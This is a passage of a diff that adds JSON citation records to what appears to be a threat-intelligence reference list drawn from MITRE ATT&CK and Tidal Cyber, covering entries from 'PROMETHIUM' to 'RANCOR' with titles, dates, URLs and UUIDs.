"2020-07-20T00:00:00Z", + "date_published": "2020-06-29T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html" + ], + "source": "MITRE", + "title": "PROMETHIUM extends global reach with StrongPity3 APT" + }, + "related": [], + "uuid": "188d990e-f0be-40f2-90f3-913dfe687d27", + "value": "Talos Promethium June 2020" + }, + { + "description": "Lich, B. (2016, May 31). Protect derived domain credentials with Credential Guard. Retrieved June 1, 2016.", + "meta": { + "date_accessed": "2016-06-01T00:00:00Z", + "date_published": "2016-05-31T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/credential-guard" + ], + "source": "MITRE", + "title": "Protect derived domain credentials with Credential Guard" + }, + "related": [], + "uuid": "d5b2446b-4685-490f-8181-1169cd049bee", + "value": "TechNet Credential Guard" + }, + { + "description": "Microsoft. (2016, October 12). Protected Users Security Group. Retrieved May 29, 2020.", + "meta": { + "date_accessed": "2020-05-29T00:00:00Z", + "date_published": "2016-10-12T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group" + ], + "source": "MITRE", + "title": "Protected Users Security Group" + }, + "related": [], + "uuid": "e6316ecd-da29-4928-a868-c9876badce62", + "value": "Microsoft Protected Users Security Group" + }, + { + "description": "CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring and Management Software. Retrieved February 2, 2023.", + "meta": { + "date_accessed": "2023-02-02T00:00:00Z", + "refs": [ + "https://www.cisa.gov/uscert/ncas/alerts/aa23-025a" + ], + "source": "MITRE", + "title": "Protecting Against Malicious Use of Remote Monitoring and Management Software" + }, + "related": [], + "uuid": "1ee55a8c-9e9d-520a-a3d3-1d2da57e0265", + "value": "CISA Remote Monitoring and Management Software" + }, + { + "description": "Microsoft. (2022, August 26). Protecting Microsoft 365 from on-premises attacks. Retrieved February 21, 2023.", + "meta": { + "date_accessed": "2023-02-21T00:00:00Z", + "date_published": "2022-08-26T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/fundamentals/protect-m365-from-on-premises-attacks" + ], + "source": "MITRE", + "title": "Protecting Microsoft 365 from on-premises attacks" + }, + "related": [], + "uuid": "95e19778-95ce-585a-892e-e6a8c20389f7", + "value": "Protecting Microsoft 365 From On-Premises Attacks" + }, + { + "description": "Pilkington, M. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016.", + "meta": { + "date_accessed": "2016-08-17T00:00:00Z", + "date_published": "2012-12-17T00:00:00Z", + "refs": [ + "https://www.sans.org/blog/protecting-privileged-domain-accounts-psexec-deep-dive/" + ], + "source": "MITRE", + "title": "Protecting Privileged Domain Accounts: PsExec Deep-Dive" + }, + "related": [], + "uuid": "a8d1e40d-b291-443c-86cc-edf6db00b898", + "value": "SANS PsExec" + }, + { + "description": "Docker. (n.d.). Protect the Docker Daemon Socket. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "refs": [ + "https://docs.docker.com/engine/security/protect-access/" + ], + "source": "MITRE", + "title": "Protect the Docker Daemon Socket" + }, + "related": [], + "uuid": "48ce6b2c-57e7-4467-b0ea-3160ac46817e", + "value": "Docker Daemon Socket Protect" + }, + { + "description": "Smith, A.. (2017, December 22). Protect your network from Emotet Trojan with Malwarebytes Endpoint Security. Retrieved January 17, 2019.", + "meta": { + "date_accessed": "2019-01-17T00:00:00Z", + "date_published": "2017-12-22T00:00:00Z", + "refs": [ + "https://support.malwarebytes.com/docs/DOC-2295" + ], + "source": "MITRE", + "title": "Protect your network from Emotet Trojan with Malwarebytes Endpoint Security" + }, + "related": [], + "uuid": "3642af0b-f14d-4860-a87c-fb57dc107a49", + "value": "Malwarebytes Emotet Dec 2017" + }, + { + "description": "LOLBAS. (2022, July 24). ProtocolHandler.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-07-24T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/" + ], + "source": "Tidal Cyber", + "title": "ProtocolHandler.exe" + }, + "related": [], + "uuid": "1f678111-dfa3-4c06-9359-816b9ca12cd0", + "value": "ProtocolHandler.exe - LOLBAS Project" + }, + { + "description": "Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018.", + "meta": { + "date_accessed": "2018-03-19T00:00:00Z", + "date_published": "2018-05-10T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does" + ], + "source": "MITRE", + "title": "ProtonB What this Mac Malware Actually Does" + }, + "related": [], + "uuid": "9c43d646-9ac2-43b5-80b6-9e69dcb57617", + "value": "cybereason osx proton" + }, + { + "description": "LOLBAS. (2023, June 30). Provlaunch.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2023-06-30T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/" + ], + "source": "Tidal Cyber", + "title": "Provlaunch.exe" + }, + "related": [], + "uuid": "56a57369-4707-4dff-ad23-431109f24233", + "value": "Provlaunch.exe - LOLBAS Project" + }, + { + "description": "FBI. (2022, August 18). Proxies and Configurations Used for Credential Stuffing Attacks on Online Customer Accounts . Retrieved July 6, 2023.", + "meta": { + "date_accessed": "2023-07-06T00:00:00Z", + "date_published": "2022-08-18T00:00:00Z", + "refs": [ + "https://www.ic3.gov/Media/News/2022/220818.pdf" + ], + "source": "MITRE", + "title": "Proxies and Configurations Used for Credential Stuffing Attacks on Online Customer Accounts" + }, + "related": [], + "uuid": "17f9b7b0-3e1a-5d75-9030-da79fcccdb49", + "value": "FBI Proxies Credential Stuffing" + }, + { + "description": "Crystal Morin. (2023, April 4). Proxyjacking has Entered the Chat. Retrieved July 6, 2023.", + "meta": { + "date_accessed": "2023-07-06T00:00:00Z", + "date_published": "2023-04-04T00:00:00Z", + "refs": [ + "https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/" + ], + "source": "MITRE", + "title": "Proxyjacking has Entered the Chat" + }, + "related": [], + "uuid": "26562be2-cab6-5867-9a43-d8a59c663596", + "value": "Sysdig Proxyjacking" + }, + { + "description": "Lawrence Abrams. (2017, July 12). PSA: Don't Open SPAM Containing Password Protected Word Docs. Retrieved January 5, 2022.", + "meta": { + "date_accessed": "2022-01-05T00:00:00Z", + "date_published": "2017-07-12T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/" + ], + "source": "MITRE", + "title": "PSA: Don't Open SPAM Containing Password Protected Word Docs" + }, + "related": [], + "uuid": "fe6f3ee6-b0a4-4092-947b-48e02a9255c1", + "value": "Password Protected Word Docs" + }, + { + "description": "Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.", + "meta": { + "date_accessed": "2016-06-01T00:00:00Z", + "date_published": "2016-04-21T00:00:00Z", + "refs": [ + "https://github.com/jaredhaight/PSAttack" + ], + "source": "MITRE", + "title": "PS>Attack" + }, + "related": [], + "uuid": "929e37ed-c230-4517-a2ef-b7896bd3e4a2", + "value": "Github PSAttack" + }, + { + "description": "Russinovich, M. (2004, June 28). PsExec. Retrieved December 17, 2015.", + "meta": { + "date_accessed": "2015-12-17T00:00:00Z", + "date_published": "2004-06-28T00:00:00Z", + "refs": [ + "http://windowsitpro.com/systems-management/psexec" + ], + "source": "MITRE", + "title": "PsExec" + }, + "related": [], + "uuid": "d6216ce3-1e63-4bb1-b379-b530c8203a96", + "value": "PsExec Russinovich" + }, + { + "description": "Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.", + "meta": { + "date_accessed": "2016-06-03T00:00:00Z", + "date_published": "2013-08-08T00:00:00Z", + "refs": [ + "http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass" + ], + "source": "MITRE", + "title": "PsExec UAC Bypass" + }, + "related": [], + "uuid": "824739ac-633a-40e0-bb01-2bfd43714d67", + "value": "SANS UAC Bypass" + }, + { + "description": "HarmJ0y et al. (2021, June 16). PSPKIAudit. Retrieved August 2, 2022.", + "meta": { + "date_accessed": "2022-08-02T00:00:00Z", + "date_published": "2021-06-16T00:00:00Z", + "refs": [ + "https://github.com/GhostPack/PSPKIAudit" + ], + "source": "MITRE", + "title": "PSPKIAudit" + }, + "related": [], + "uuid": "ac3d5502-0ab9-446e-bf8c-22675f92f017", + "value": "GitHub PSPKIAudit" + }, + { + "description": "LOLBAS. (2020, June 27). Psr.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-06-27T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Psr/" + ], + "source": "Tidal Cyber", + "title": "Psr.exe" + }, + "related": [], + "uuid": "a00782cf-f6b2-4b63-9d8d-97efe17e11c0", + "value": "Psr.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx" + ], + "source": "MITRE", + "title": "PsSetCreateProcessNotifyRoutine routine" + }, + "related": [], + "uuid": "c407645d-1109-49a7-a4c0-51ec9cd54c8d", + "value": "Microsoft PsSetCreateProcessNotifyRoutine routine" + }, + { + "description": "Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. Retrieved February 21, 2020.", + "meta": { + "date_accessed": "2020-02-21T00:00:00Z", + "date_published": "2020-02-09T00:00:00Z", + "refs": [ + "http://man7.org/linux/man-pages/man2/ptrace.2.html" + ], + "source": "MITRE", + "title": "PTRACE(2) - Linux Programmer's Manual" + }, + "related": [], + "uuid": "fc5e63e7-090a-441b-8e34-9946e1840b49", + "value": "PTRACE man" + }, + { + "description": "Wikipedia. (2017, June 29). Public-key cryptography. Retrieved July 5, 2017.", + "meta": { + "date_accessed": "2017-07-05T00:00:00Z", + "date_published": "2017-06-29T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Public-key_cryptography" + ], + "source": "MITRE", + "title": "Public-key cryptography" + }, + "related": [], + "uuid": "1b7514e7-477d-44a2-acee-d1819066dee4", + "value": "Wikipedia Public Key Crypto" + }, + { + "description": "Committee of Inquiry into the Cyber Attack on SingHealth. (2019, January 10). Public Report of the Committee of Inquiry into the Cyber Attack on Singapore Health Services Private Limited's Patient Database. Retrieved June 29, 2020.", + "meta": { + "date_accessed": "2020-06-29T00:00:00Z", + "date_published": "2019-01-10T00:00:00Z", + "refs": [ + "https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx" + ], + "source": "MITRE", + "title": "Public Report of the Committee of Inquiry into the Cyber Attack on Singapore Health Services Private Limited's Patient Database" + }, + "related": [], + "uuid": "d1f699e3-7c9d-4a95-ad58-f46e665a4d37", + "value": "SingHealth Breach Jan 2019" + }, + { + "description": "Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021.", + "meta": { + "date_accessed": "2021-07-23T00:00:00Z", + "date_published": "2017-10-16T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn" + ], + "source": "MITRE", + "title": "pubprn" + }, + "related": [], + "uuid": "c845c67a-20ab-405c-95fe-2f667f83b886", + "value": "pubprn" + }, + { + "description": "LOLBAS. (2018, May 25). Pubprn.vbs. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Pubprn/" + ], + "source": "Tidal Cyber", + "title": "Pubprn.vbs" + }, + "related": [], + "uuid": "d2b6b9fd-5f80-41c0-ac22-06b78c86a9e5", + "value": "Pubprn.vbs - LOLBAS Project" + }, + { + "description": "White, J. (2017, March 10). Pulling Back the Curtains on EncodedCommand PowerShell Attacks. Retrieved February 12, 2018.", + "meta": { + "date_accessed": "2018-02-12T00:00:00Z", + "date_published": "2017-03-10T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/" + ], + "source": "MITRE", + "title": "Pulling Back the Curtains on EncodedCommand PowerShell Attacks" + }, + "related": [], + "uuid": "069ef9af-3402-4b13-8c60-b397b0b0bfd7", + "value": "PaloAlto EncodedCommand March 2017" + }, + { + "description": "Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved December 17, 2020.", + "meta": { + "date_accessed": "2020-12-17T00:00:00Z", + "date_published": "2018-12-06T00:00:00Z", + "refs": [ + "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat" + ], + "source": "MITRE", + "title": "Pulling Linux Rabbit/Rabbot Malware Out of a Hat" + }, + "related": [], + "uuid": "ec413dc7-028c-4153-9e98-abe85961747f", + "value": "anomali-linux-rabbit" + }, + { + "description": "Anomali Labs. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved March 4, 2019.", + "meta": { + "date_accessed": "2019-03-04T00:00:00Z", + "date_published": "2018-12-06T00:00:00Z", + "refs": [ + "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat" + ], + "source": "MITRE", + "title": "Pulling Linux Rabbit/Rabbot Malware Out of a Hat" + }, + "related": [], + "uuid": "e843eb47-21b0-44b9-8065-02aea0a0b05f", + "value": "Anomali Linux Rabbit 2018" + }, + { + "description": "Gross, J. and Walter, J.. (2016, January 12). Puttering into the Future.... Retrieved January 22, 2016.", + "meta": { + "date_accessed": "2016-01-22T00:00:00Z", + "date_published": "2016-01-12T00:00:00Z", + "refs": [ + "http://blog.cylance.com/puttering-into-the-future" + ], + "source": "MITRE", + "title": "Puttering into the Future..." + }, + "related": [], + "uuid": "058d6e8e-7ab9-4151-97de-1778ac95e18d", + "value": "Cylance Putter Panda" + }, + { + "description": "Moe, O. (2018, January 14). Putting Data in Alternate Data Streams and How to Execute It. Retrieved June 30, 2018.", + "meta": { + "date_accessed": "2018-06-30T00:00:00Z", + "date_published": "2018-01-14T00:00:00Z", + "refs": [ + "https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/" + ], + "source": "MITRE", + "title": "Putting Data in Alternate Data Streams and How to Execute It" + }, + "related": [], + "uuid": "4a711970-870c-4710-9dbc-7cfebd2e315c", + "value": "Oddvar Moe ADS1 Jan 2018" + }, + { + "description": "Moe, O. (2018, April 11). Putting Data in Alternate Data Streams and How to Execute It - Part 2. Retrieved June 30, 2018.", + "meta": { + "date_accessed": "2018-06-30T00:00:00Z", + "date_published": "2018-04-11T00:00:00Z", + "refs": [ + "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/" + ], + "source": "MITRE", + "title": "Putting Data in Alternate Data Streams and How to Execute It - Part 2" + }, + "related": [], + "uuid": "b280f0c8-effe-45a4-a64a-a9a8b6ad2122", + "value": "Oddvar Moe ADS2 Apr 2018" + }, + { + "description": "Moran, B. (2020, November 18). Putting Together the RDPieces. Retrieved October 17, 2022.", + "meta": { + "date_accessed": "2022-10-17T00:00:00Z", + "date_published": "2020-11-18T00:00:00Z", + "refs": [ + "https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf" + ], + "source": "MITRE", + "title": "Putting Together the RDPieces" + }, + "related": [], + "uuid": "794331fb-f1f2-4aaa-aae8-d1c4c95fb00f", + "value": "Moran RDPieces" + }, + { + "description": "PuTTY. (n.d.). PuTTY Download Page. Retrieved November 16, 2023.", + "meta": { + "date_accessed": "2023-11-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.putty.org/" + ], + "source": "Tidal Cyber", + "title": "PuTTY Download Page" + }, + "related": [], + "uuid": "bf278270-128e-483b-9f09-ce24f5f6ed80", + "value": "PuTTY Download Page" + }, + { + "description": "Wikipedia. (2007, August 9). pwdump. Retrieved June 22, 2016.", + "meta": { + "date_accessed": "2016-06-22T00:00:00Z", + "date_published": "2007-08-09T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Pwdump" + ], + "source": "MITRE", + "title": "pwdump" + }, + "related": [], + "uuid": "6a1a1ae1-a587-41f5-945f-011d6808e5b8", + "value": "Wikipedia pwdump" + }, + { + "description": "THe DFIR Report. (2020, November 23). PYSA/Mespinoza Ransomware. Retrieved March 17, 2021.", + "meta": { + "date_accessed": "2021-03-17T00:00:00Z", + "date_published": "2020-11-23T00:00:00Z", + "refs": [ + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/" + ], + "source": "MITRE", + "title": "PYSA/Mespinoza Ransomware" + }, + "related": [], + "uuid": "a00ae87e-6e64-4f1c-8639-adca436c217e", + "value": "DFIR Pysa Nov 2020" + }, + { + "description": "NHS Digital. (2020, October 10). Pysa Ransomware: Another 'big-game hunter' ransomware. Retrieved March 17, 2021.", + "meta": { + "date_accessed": "2021-03-17T00:00:00Z", + "date_published": "2020-10-10T00:00:00Z", + "refs": [ + "https://digital.nhs.uk/cyber-alerts/2020/cc-3633" + ], + "source": "MITRE", + "title": "Pysa Ransomware: Another 'big-game hunter' ransomware" + }, + "related": [], + "uuid": "5a853dfb-d935-4d85-a5bf-0ab5279fd32e", + "value": "NHS Digital Pysa Oct 2020" + }, + { + "description": "decalage2. (2019, December 3). python-oletools. Retrieved September 18, 2020.", + "meta": { + "date_accessed": "2020-09-18T00:00:00Z", + "date_published": "2019-12-03T00:00:00Z", + "refs": [ + "https://github.com/decalage2/oletools" + ], + "source": "MITRE", + "title": "python-oletools" + }, + "related": [], + "uuid": "9036fac0-dca8-4956-b0b4-469801adad28", + "value": "oletools toolkit" + }, + { + "description": "Nettitude. (2018, July 23). Python Server for PoshC2. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "date_published": "2018-07-23T00:00:00Z", + "refs": [ + "https://github.com/nettitude/PoshC2_Python" + ], + "source": "MITRE", + "title": "Python Server for PoshC2" + }, + "related": [], + "uuid": "45e79c0e-a2f6-4b56-b621-4142756bd1b1", + "value": "GitHub PoshC2" + }, + { + "description": "Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved September 27, 2021.", + "meta": { + "date_accessed": "2021-09-27T00:00:00Z", + "date_published": "2020-12-17T00:00:00Z", + "refs": [ + "https://success.trendmicro.com/solution/000283381" + ], + "source": "MITRE", + "title": "QAKBOT: A decade-old malware still with new tricks" + }, + "related": [], + "uuid": "c061ce45-1452-4c11-9586-bd5eb2d718ab", + "value": "Trend Micro Qakbot December 2020" + }, + { + "description": "Cyberint. (2021, May 25). Qakbot Banking Trojan. Retrieved September 27, 2021.", + "meta": { + "date_accessed": "2021-09-27T00:00:00Z", + "date_published": "2021-05-25T00:00:00Z", + "refs": [ + "https://blog.cyberint.com/qakbot-banking-trojan" + ], + "source": "MITRE", + "title": "Qakbot Banking Trojan" + }, + "related": [], + "uuid": "1baeac94-9168-4813-ab72-72e609250745", + "value": "Cyberint Qakbot May 2021" + }, + { + "description": "Sette, N. et al. (2020, June 4). Qakbot Malware Now Exfiltrating Emails for Sophisticated Thread Hijacking Attacks. Retrieved September 27, 2021.", + "meta": { + "date_accessed": "2021-09-27T00:00:00Z", + "date_published": "2020-06-04T00:00:00Z", + "refs": [ + "https://www.kroll.com/en/insights/publications/cyber/qakbot-malware-exfiltrating-emails-thread-hijacking-attacks" + ], + "source": "MITRE", + "title": "Qakbot Malware Now Exfiltrating Emails for Sophisticated Thread Hijacking Attacks" + }, + "related": [], + "uuid": "716960fd-c22d-42af-ba9b-295fee02657f", + "value": "Kroll Qakbot June 2020" + }, + { + "description": "Mendoza, E. et al. (2020, May 25). Qakbot Resurges, Spreads through VBS Files. Retrieved September 27, 2021.", + "meta": { + "date_accessed": "2021-09-27T00:00:00Z", + "date_published": "2020-05-25T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/ph/security/news/cybercrime-and-digital-threats/qakbot-resurges-spreads-through-vbs-files" + ], + "source": "MITRE", + "title": "Qakbot Resurges, Spreads through VBS Files" + }, + "related": [], + "uuid": "e2791c37-e149-43e7-b7c3-c91a6d1bc91e", + "value": "Trend Micro Qakbot May 2020" + }, + { + "description": "Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021.", + "meta": { + "date_accessed": "2021-09-27T00:00:00Z", + "date_published": "2021-09-02T00:00:00Z", + "refs": [ + "https://securelist.com/qakbot-technical-analysis/103931/" + ], + "source": "MITRE", + "title": "QakBot technical analysis" + }, + "related": [], + "uuid": "f40cabe3-a324-4b4d-8e95-25c036dbd8b5", + "value": "Kaspersky QakBot September 2021" + }, + { + "description": "Rainey, K. (n.d.). Qbot. Retrieved September 27, 2021.", + "meta": { + "date_accessed": "2021-09-27T00:00:00Z", + "refs": [ + "https://redcanary.com/threat-detection-report/threats/qbot/" + ], + "source": "MITRE", + "title": "Qbot" + }, + "related": [], + "uuid": "6e4960e7-ae5e-4b68-ac85-4bd84e940634", + "value": "Red Canary Qbot" + }, + { + "description": "hoakley. (2020, October 29). Quarantine and the quarantine flag. Retrieved September 13, 2021.", + "meta": { + "date_accessed": "2021-09-13T00:00:00Z", + "date_published": "2020-10-29T00:00:00Z", + "refs": [ + "https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/" + ], + "source": "MITRE", + "title": "Quarantine and the quarantine flag" + }, + "related": [], + "uuid": "7cce88cc-fbfb-43e1-a330-ac55bce9e394", + "value": "TheEclecticLightCompany Quarantine and the flag" + }, + { + "description": "MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018.", + "meta": { + "date_accessed": "2018-07-10T00:00:00Z", + "refs": [ + "https://github.com/quasar/QuasarRAT" + ], + "source": "MITRE", + "title": "QuasarRAT" + }, + "related": [], + "uuid": "c87e4427-af97-4e93-9596-ad5a588aa171", + "value": "GitHub QuasarRAT" + }, + { + "description": "0DAY IN {REA_TEAM}. (2024, January 6). [QuickNote] Technical Analysis of recent Pikabot Core Module. Retrieved January 11, 2024.", + "meta": { + "date_accessed": "2024-01-11T00:00:00Z", + "date_published": "2024-01-06T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://kienmanowar.wordpress.com/2024/01/06/quicknote-technical-analysis-of-recent-pikabot-core-module/" + ], + "source": "Tidal Cyber", + "title": "[QuickNote] Technical Analysis of recent Pikabot Core Module" + }, + "related": [], + "uuid": "08ec9726-5a1d-4b2e-82d5-a5a9e7e917ae", + "value": "0DAY IN {REA_TEAM} Pikabot January 6 2024" + }, + { + "description": "Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019.", + "meta": { + "date_accessed": "2019-06-03T00:00:00Z", + "date_published": "2009-11-22T00:00:00Z", + "refs": [ + "https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/" + ], + "source": "MITRE", + "title": "Quickpost: SelectMyParent or Playing With the Windows Process Tree" + }, + "related": [], + "uuid": "1fee31b0-2d9c-4c02-b494-d3a6b80f12f3", + "value": "DidierStevens SelectMyParent Nov 2009" + }, + { + "description": "Microsoft. (2019, May 8). Quickstart: Register an application with the Microsoft identity platform. Retrieved September 12, 2019.", + "meta": { + "date_accessed": "2019-09-12T00:00:00Z", + "date_published": "2019-05-08T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app" + ], + "source": "MITRE", + "title": "Quickstart: Register an application with the Microsoft identity platform" + }, + "related": [], + "uuid": "36a06c99-55ca-4163-9450-c3b84ae10039", + "value": "Microsoft - Azure AD App Registration - May 2019" + }, + { + "description": "Microsoft. (2023, January 13). Quickstart: Set and retrieve a secret from Azure Key Vault using Azure CLI. Retrieved September 25, 2023.", + "meta": { + "date_accessed": "2023-09-25T00:00:00Z", + "date_published": "2023-01-13T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/azure/key-vault/secrets/quick-create-cli" + ], + "source": "MITRE", + "title": "Quickstart: Set and retrieve a secret from Azure Key Vault using Azure CLI" + }, + "related": [], + "uuid": "8f076aae-38c0-5335-9f7a-1e29b90fc33f", + "value": "Microsoft Azure Key Vault" + }, + { + "description": "Google. (2019, October 3). Quickstart: Using the dashboard. Retrieved October 8, 2019.", + "meta": { + "date_accessed": "2019-10-08T00:00:00Z", + "date_published": "2019-10-03T00:00:00Z", + "refs": [ + "https://cloud.google.com/security-command-center/docs/quickstart-scc-dashboard" + ], + "source": "MITRE", + "title": "Quickstart: Using the dashboard" + }, + "related": [], + "uuid": "a470fe2a-40ce-4060-8dfc-2cdb56bbc18b", + "value": "Google Command Center Dashboard" + }, + { + "description": "Antazo, F. and Yambao, M. (2016, August 10). R980 Ransomware Found Abusing Disposable Email Address Service. Retrieved October 13, 2020.", + "meta": { + "date_accessed": "2020-10-13T00:00:00Z", + "date_published": "2016-08-10T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service/" + ], + "source": "MITRE", + "title": "R980 Ransomware Found Abusing Disposable Email Address Service" + }, + "related": [], + "uuid": "6afd89ba-2f51-4192-82b3-d961cc86adf1", + "value": "Trend Micro R980 2016" + }, + { + "description": "Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023.", + "meta": { + "date_accessed": "2023-01-11T00:00:00Z", + "date_published": "2022-05-01T00:00:00Z", + "refs": [ + "https://www.linkedin.com/pulse/raas-avoslocker-incident-response-analysis-fl%C3%A1vio-costa?trk=articles_directory" + ], + "source": "MITRE", + "title": "RaaS AvosLocker Incident Response Analysis" + }, + "related": [], + "uuid": "a94268d8-6b7c-574b-a588-d8fd80c27fd3", + "value": "Costa AvosLocker May 2022" + }, + { + "description": "Quentin Bourgue, Pierre Le Bourhis, Threat & Detection Research Team - TDR. (2022, June 28). Raccoon Stealer v2 – Part 1: The return of the dead. Retrieved November 16, 2023.", + "meta": { + "date_accessed": "2023-11-16T00:00:00Z", + "date_published": "2022-06-28T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/" + ], + "source": "Tidal Cyber", + "title": "Raccoon Stealer v2 – Part 1: The return of the dead" + }, + "related": [], + "uuid": "df0c9cbd-8692-497e-9f81-cf9e44a3a5cd", + "value": "Sekoia.io Raccoon Stealer June 28 2022" + }, + { + "description": "DOJ. (2018, March 23). U.S. v. Rafatnejad et al . Retrieved February 3, 2021.", + "meta": { + "date_accessed": "2021-02-03T00:00:00Z", + "refs": [ + "https://www.justice.gov/usao-sdny/press-release/file/1045781/download" + ], + "source": "MITRE", + "title": "Rafatnejad et al" + }, + "related": [], + "uuid": "7dfdccd5-d035-4678-89c1-f5f1630d7a79", + "value": "DOJ Iran Indictments March 2018" + }, + { + "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.", + "meta": { + "date_accessed": "2020-06-29T00:00:00Z", + "date_published": "2020-05-21T00:00:00Z", + "refs": [ + "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/" + ], + "source": "MITRE", + "title": "Ragnar Locker ransomware deploys virtual machine to dodge security" + }, + "related": [], + "uuid": "04ed6dc0-45c2-4e36-8ec7-a75f6f715f0a", + "value": "Sophos Ragnar May 2020" + }, + { + "description": "Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019.", + "meta": { + "date_accessed": "2019-10-06T00:00:00Z", + "date_published": "2018-11-21T00:00:00Z", + "refs": [ + "https://github.com/True-Demon/raindance" + ], + "source": "MITRE", + "title": "RainDance" + }, + "related": [], + "uuid": "321bba10-06c6-4c4f-a3e0-318561fa0fed", + "value": "GitHub Raindance" + }, + { + "description": "Symantec Threat Hunter Team. (2021, January 18). Raindrop: New Malware Discovered in SolarWinds Investigation. Retrieved January 19, 2021.", + "meta": { + "date_accessed": "2021-01-19T00:00:00Z", + "date_published": "2021-01-18T00:00:00Z", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware" + ], + "source": "MITRE", + "title": "Raindrop: New Malware Discovered in SolarWinds Investigation" + }, + "related": [], + "uuid": "9185092d-3d99-466d-b885-f4e76fe74b6b", + "value": "Symantec RAINDROP January 2021" + }, + { + "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber‑espionage toolkit tailored for air‑gapped networks. Retrieved May 27, 2020.", + "meta": { + "date_accessed": "2020-05-27T00:00:00Z", + "date_published": "2020-05-13T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/" + ], + "source": "MITRE", + "title": "Ramsay: A cyber‑espionage toolkit tailored for air‑gapped networks" + }, + "related": [], + "uuid": "3c149b0b-f37c-4d4e-aa61-351c87fd57ce", + "value": "Eset Ramsay May 2020" + }, + { + "description": "Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.", + "meta": { + "date_accessed": "2018-07-02T00:00:00Z", + 